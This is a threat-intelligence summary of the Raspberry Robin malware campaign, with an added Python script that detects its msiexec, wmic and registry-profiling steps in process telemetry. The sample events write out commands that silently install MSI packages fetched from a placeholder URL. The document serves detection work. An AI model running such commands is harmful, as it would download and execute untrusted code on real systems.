Raspberry Robin Adding Layers of Deception
Category: Malware Campaign | Industries: Government, Telecommunications | Level: Tactical | Source: Trend Micro
Researchers from Trend Micro observed new infection routines from Raspberry Robin when the malware compromised organizations in late September. During these attacks, the malware carefully avoided detection by using fake payloads to deceive security products while hiding the real payload under a heavy layer of obfuscation. Trend Micro researchers surmise that Raspberry Robin is being deployed to support cyber-espionage and data-theft objectives. Any stolen credentials can be sold to other cybercriminals on darknet forums. Many victims of this campaign have been government agencies and telecommunications organizations located in Latin America, Australia, Mexico, Croatia, and Italy.
Raspberry Robin infections often begin with a malicious USB drive that drops an LNK file; the LNK calls msiexec or wmic to download and install the malware as a Windows Installer (MSI) package. The malware then runs a system check to determine whether the infected host is running a security solution or is a virtual machine. If so, the loader drops a fake payload to derail analysis of the malware's real infection routine. The fake payload finishes by installing an adware named 'BrowserAssistant' to deceive analysts into believing it is the final payload.
If the system check does not identify a VM or an installed security solution, the real Raspberry Robin malware is executed. "The real payload is made up of three layers, with the third layer containing the actual payload binary packed twice. Within the real payload is an embedded custom Tor client designed to communicate with the real payload using shared memory." Before communicating with the attacker’s command and control (C2) server, the malware queries the Windows registry to gather information about the system and establishes persistence to survive reboots. To spread further, Raspberry Robin copies itself to any attached USB drive.
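The delivery chain and pre-C2 behaviour described above (an LNK launching msiexec or wmic to pull an MSI from a URL, then registry queries to profile the host) map directly onto process-creation telemetry. The following is an added detection example, not code from Trend Micro or Anvilogic: it runs three simple rules over constructed process-creation events. The event schema (parent, image, cmdline), the hosts, paths and URLs, and the specific registry keys treated as "host profiling" are all assumptions made for illustration; the report only states that the malware queries the registry, not which keys.

```python
"""Detection triage for the Raspberry Robin delivery chain described above.

Added example, not Trend Micro's or Anvilogic's code. The events below are
constructed for illustration; the (parent, image, cmdline) fields are an
assumed normalised process-creation schema (e.g. Sysmon Event ID 1 or EDR
telemetry), not a specific vendor format.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line


# Constructed sample telemetry (hypothetical hosts, paths and URLs).
SAMPLE_EVENTS: List[ProcEvent] = [
    # 1. LNK on a USB stick launching msiexec to install a package from a URL
    ProcEvent("explorer.exe", "msiexec.exe",
              r"msiexec.exe /q /i http://example.invalid/files/update.msi"),
    # 2. LNK launching wmic, which in turn spawns msiexec
    ProcEvent("explorer.exe", "wmic.exe",
              'wmic process call create "msiexec /q /i http://example.invalid/pkg.msi"'),
    # 3. Host profiling via the registry before C2 contact
    ProcEvent("rundll32.exe", "reg.exe",
              r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
    # 4. Benign: an administrator installing a local MSI silently
    ProcEvent("cmd.exe", "msiexec.exe",
              r"msiexec.exe /i C:\Installers\7z2201-x64.msi /qn"),
    # 5. Benign: a script reading an unrelated registry value
    ProcEvent("cmd.exe", "reg.exe",
              r"reg query HKCU\Console /v QuickEdit"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
INSTALL_SWITCH_RE = re.compile(r"(?:^|\s)[/-]i(?:\s|$)", re.IGNORECASE)
# Keys commonly read to fingerprint a host. Which keys the malware actually
# reads is an assumption; the report only says it queries the registry.
PROFILING_KEYS = (
    r"software\microsoft\windows nt\currentversion",
    r"software\microsoft\cryptography",            # MachineGuid
    r"system\currentcontrolset\control\computername",
)


def msiexec_remote_install(ev: ProcEvent) -> bool:
    """msiexec.exe asked to install a package fetched over HTTP(S)."""
    return (ev.image.lower() == "msiexec.exe"
            and bool(INSTALL_SWITCH_RE.search(ev.cmdline))
            and bool(URL_RE.search(ev.cmdline)))


def wmic_spawns_msiexec(ev: ProcEvent) -> bool:
    """wmic 'process call create' used as a proxy to launch msiexec."""
    cl = ev.cmdline.lower()
    return (ev.image.lower() == "wmic.exe"
            and "process" in cl and "call" in cl and "create" in cl
            and "msiexec" in cl)


def registry_host_profiling(ev: ProcEvent) -> bool:
    """reg.exe querying host-identifying keys from a non-shell parent."""
    cl = ev.cmdline.lower()
    return (ev.image.lower() == "reg.exe"
            and "query" in cl
            and any(k in cl for k in PROFILING_KEYS)
            and ev.parent.lower() not in ("cmd.exe", "powershell.exe"))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("msiexec_remote_install", msiexec_remote_install),
    ("wmic_spawns_msiexec", wmic_spawns_msiexec),
    ("registry_host_profiling", registry_host_profiling),
]


def triage(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule_name, cmdline) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.cmdline))
    return hits


if __name__ == "__main__":
    for name, cmd in triage(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Run as a script it flags events 1 to 3 and leaves the two benign events alone. The msiexec rule keys on a remote URL rather than on the silent-install switch, since quiet local installs are routine for administrators, and the registry rule excludes interactive shells as parents to cut down on noise from admin scripts; both thresholds are tuning choices for this example, not part of the report.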
- Raspberry Robin Abuses MsiExec
Anvilogic Use Cases:
- MSIExec Install MSI File
- WinRM Tools
- Query Registry